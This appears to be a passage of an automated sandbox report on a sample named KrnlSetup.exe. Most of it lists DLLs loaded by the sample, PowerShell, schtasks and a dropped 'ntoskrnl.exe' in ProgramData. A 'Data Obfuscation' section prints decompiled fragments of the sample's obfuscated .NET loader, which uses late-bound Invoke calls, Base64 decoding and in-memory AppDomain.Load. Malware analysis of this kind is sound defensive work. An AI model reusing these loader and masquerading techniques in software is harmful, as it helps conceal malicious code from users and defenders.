Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: mscoree.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: apphelp.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: version.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: sspicli.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: mscoree.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: version.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: sspicli.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: mscoree.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: version.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: sspicli.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\ntoskrnl.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: ntoskrnl.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\ProgramData\ntoskrnl.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\KrnlSetup.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: KrnlSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: KrnlSetup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: KrnlSetup.exe, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.aXR8CuhiUox9pjrQs8F2XZGCXHBUe6p9t,nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.vKVmfO4Ax2hknrWFqsEOTHlHT3atERGAh,nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm._337gb0bcRj1Fe4BRfkLfiIOoAuIUBiiuV,nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.VZqaUTpyJP1QEyzwtq6vJz1rjboWx0Ebl,ZErofTOG7QyG2YqbzUeXCBXVgf.EI90XyScDOpIXlVEju0Rm2SCJH()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: KrnlSetup.exe, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{SQlBU6hKSoWFjQZlvSPUteh54WrjfAQjQN4OP3FawJInThLrua9[2],ZErofTOG7QyG2YqbzUeXCBXVgf.p8hj3UOnEV6guk8AAEMp8hQ6vI(Convert.FromBase64String(SQlBU6hKSoWFjQZlvSPUteh54WrjfAQjQN4OP3FawJInThLrua9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: KrnlSetup.exe, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { SQlBU6hKSoWFjQZlvSPUteh54WrjfAQjQN4OP3FawJInThLrua9[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: ntoskrnl.exe.0.dr, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.aXR8CuhiUox9pjrQs8F2XZGCXHBUe6p9t,nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.vKVmfO4Ax2hknrWFqsEOTHlHT3atERGAh,nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm._337gb0bcRj1Fe4BRfkLfiIOoAuIUBiiuV,nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.VZqaUTpyJP1QEyzwtq6vJz1rjboWx0Ebl,ZErofTOG7QyG2YqbzUeXCBXVgf.EI90XyScDOpIXlVEju0Rm2SCJH()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: ntoskrnl.exe.0.dr, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{SQlBU6hKSoWFjQZlvSPUteh54WrjfAQjQN4OP3FawJInThLrua9[2],ZErofTOG7QyG2YqbzUeXCBXVgf.p8hj3UOnEV6guk8AAEMp8hQ6vI(Convert.FromBase64String(SQlBU6hKSoWFjQZlvSPUteh54WrjfAQjQN4OP3FawJInThLrua9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: ntoskrnl.exe.0.dr, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { SQlBU6hKSoWFjQZlvSPUteh54WrjfAQjQN4OP3FawJInThLrua9[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: KrnlSetup.exe, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs .Net Code: Aeazd6GI8VHwcZLZirW6YjpAWBpfjdSdVZw8GtbqjBu90FpExbg System.AppDomain.Load(byte[])
Source: KrnlSetup.exe, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs .Net Code: yXX3u9IVgTPCIDGP4x8Ag6NIv9iWWYrcYHxfy4MHB49XsIrAOW5 System.AppDomain.Load(byte[])
Source: KrnlSetup.exe, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs .Net Code: yXX3u9IVgTPCIDGP4x8Ag6NIv9iWWYrcYHxfy4MHB49XsIrAOW5
Source: ntoskrnl.exe.0.dr, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs .Net Code: Aeazd6GI8VHwcZLZirW6YjpAWBpfjdSdVZw8GtbqjBu90FpExbg System.AppDomain.Load(byte[])
Source: ntoskrnl.exe.0.dr, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs .Net Code: yXX3u9IVgTPCIDGP4x8Ag6NIv9iWWYrcYHxfy4MHB49XsIrAOW5 System.AppDomain.Load(byte[])
Source: ntoskrnl.exe.0.dr, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs .Net Code: yXX3u9IVgTPCIDGP4x8Ag6NIv9iWWYrcYHxfy4MHB49XsIrAOW5
Source: C:\Users\user\Desktop\KrnlSetup.exe Code function: 0_2_00007FFD9B7800BD pushad ; iretd 0_2_00007FFD9B7800C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B65D2A5 pushad ; iretd 1_2_00007FFD9B65D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B7700BD pushad ; iretd 1_2_00007FFD9B7700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B842316 push 8B485F93h; iretd 1_2_00007FFD9B84231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B64D2A5 pushad ; iretd 4_2_00007FFD9B64D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7600BD pushad ; iretd 4_2_00007FFD9B7600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B832316 push 8B485F94h; iretd 4_2_00007FFD9B83231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFD9B66D2A5 pushad ; iretd 9_2_00007FFD9B66D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFD9B78BAE8 push E85A8CD7h; ret 9_2_00007FFD9B78BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFD9B78B9FA push E85A8CD7h; ret 9_2_00007FFD9B78BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFD9B7819D4 pushad ; ret 9_2_00007FFD9B7819E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFD9B7800BD pushad ; iretd 9_2_00007FFD9B7800C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFD9B852316 push 8B485F92h; iretd 9_2_00007FFD9B85231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B65D2A5 pushad ; iretd 11_2_00007FFD9B65D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B7700BD pushad ; iretd 11_2_00007FFD9B7700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B842316 push 8B485F93h; iretd 11_2_00007FFD9B84231B
Source: C:\ProgramData\ntoskrnl.exe Code function: 15_2_00007FFD9B7600BD pushad ; iretd 15_2_00007FFD9B7600C1
